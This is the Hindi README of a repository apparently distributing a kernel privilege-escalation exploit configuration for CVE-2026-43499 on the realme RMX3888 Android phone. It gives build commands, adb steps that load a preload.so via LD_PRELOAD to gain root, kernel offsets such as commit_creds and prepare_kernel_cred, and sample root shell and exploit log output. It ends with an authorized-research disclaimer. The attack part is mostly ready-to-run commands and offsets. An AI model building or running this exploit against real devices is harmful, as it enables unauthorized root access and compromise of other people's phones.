
realme RMX3888 (Android 16) के लिए CVE-2026-43499 एक्सप्लॉइट कॉन्फ़िगरेशन - 20 सत्यापित कर्नेल ऑफसेट
इस रिपॉज़िटरी में realme RMX3888 डिवाइस को लक्षित करने वाले CVE-2026-43499 (GhostLock) एक्सप्लॉइट के लिए संपूर्ण कॉन्फ़िगरेशन फ़ाइलें शामिल हैं। सभी कर्नेल ऑफ़सेट डिवाइस के boot.img से निकाले गए हैं और सत्यापित किए गए हैं।
✓ 20 सत्यापित कर्नेल ऑफ़सेट vmlinux से निकाले गए
✓ रीयल-टाइम लॉगिंग कर्नेल पैनिक सुरक्षा के लिए O_SYNC + fsync के साथ
✓ डिवाइस-विशिष्ट कॉन्फ़िगरेशन RMX3888 के लिए
✓ एक-क्लिक कंपाइलेशन स्क्रिप्ट NDK ऑटो-डिटेक्शन के साथ
✓ व्यापक दस्तावेज़ीकरण बिल्ड गाइड के साथ
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Windows Git Bash पर, स्क्रिप्ट Android Studio और कमांड-लाइन टूल्स द्वारा उपयोग किए जाने वाले डिफ़ॉल्ट SDK पथ का स्वतः पता लगाती है: /c/Android/Sdk/ndk/*।
नोट: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL, और COPY_SPLICE_READ वर्तमान में RMX3888 टार्गेट हेडर में बिल्ड-संगत फ़ॉलबैक का उपयोग करते हैं। रनटाइम व्यवहार पर भरोसा करने से पहले उन्हें सत्यापित RMX3888 vmlinux ऑफ़सेट से बदलें।
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
नीचे दिए गए मुख्य ऑफ़सेट कर्नेल 6.1.141 से निकाले गए थे। बिल्ड-संगत फ़ॉलबैक प्रविष्टियों के लिए ऊपर दिया गया नोट देखें, जिन्हें अभी भी RMX3888-विशिष्ट सत्यापन की आवश्यकता है।
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
एकीकृत रीयल-टाइम लॉगिंग मॉड्यूल प्रदान करता है:
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
विस्तृत समस्या निवारण निर्देशों के लिए BUILD_GUIDE.md देखें, जिनमें शामिल हैं:
⚠️ चेतावनी: यह कॉन्फ़िगरेशन केवल अधिकृत सुरक्षा अनुसंधान के लिए है।
यह कॉन्फ़िगरेशन केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
इस रिपॉज़िटरी में सुरक्षा अनुसंधान सामग्री शामिल है। इस कोड के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं। अपने जोखिम पर उपयोग करें और केवल उन्हीं डिवाइसों पर जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है।
निर्मित: 2026-07-23
कर्नेल संस्करण: 6.1.141-android14-11-o-gffc54a6d2287
ऑफ़सेट सत्यापन: 100% (20/20)
स्थिति: कंपाइलेशन के लिए तैयार